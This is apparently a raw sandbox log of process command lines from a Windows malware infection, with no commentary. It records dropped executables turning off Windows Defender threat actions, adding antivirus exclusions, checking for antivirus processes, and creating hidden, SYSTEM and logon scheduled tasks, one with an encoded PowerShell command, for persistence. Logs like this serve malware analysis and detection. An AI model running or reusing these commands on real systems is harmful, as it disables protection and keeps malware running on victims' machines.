"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\cmd.exe'

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe

"C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Users\Admin\Desktop\a\Newoff.exe

C:\Users\Admin\Desktop\a\Newoff.exe

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:64;"

C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup.exe

"C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup.exe" /c:WW.Peter.CPI202405 /pmode:2 /promo:eyJib290dGltZSI6IjMiLCJtZWRhbCI6IjMiLCJuZXdzIjoiMCIsIm9wZXJhIjoiMyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjMiLCJyZW1pbmRlciI6IjMiLCJ1cGdyYWRlX25vdyI6IjAifQo=

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32

C:\Program Files (x86)\1717260008_0\360TS_Setup.exe

"C:\Program Files (x86)\1717260008_0\360TS_Setup.exe" /c:WW.Peter.CPI202405 /pmode:2 /promo:eyJib290dGltZSI6IjMiLCJtZWRhbCI6IjMiLCJuZXdzIjoiMCIsIm9wZXJhIjoiMyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjMiLCJyZW1pbmRlciI6IjMiLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'cmd.exe'

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gHUBkzNBz" /SC once /ST 00:06:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gHUBkzNBz"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "cmd" /tr "C:\ProgramData\cmd.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gHUBkzNBz"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 05:18:14 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\fpNSkKK.exe\" 0c /PspKdidaZ 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ZTNkTKukmvvbOMPkn"

C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\fpNSkKK.exe

C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\fpNSkKK.exe 0c /PspKdidaZ 385118 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 7664 -ip 7664

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7664 -s 688

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\xuHGDU.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\cmd.exe

cmd /c md 331913

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\kJrbVKY.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "ucrVpivlTlXwlAC"

C:\Windows\SysWOW64\findstr.exe

findstr /V "EnquiryAnContributionRefers" Tank

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ucrVpivlTlXwlAC"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\XgzpZcu.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\ngAfYzJ.xml" /RU "SYSTEM"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

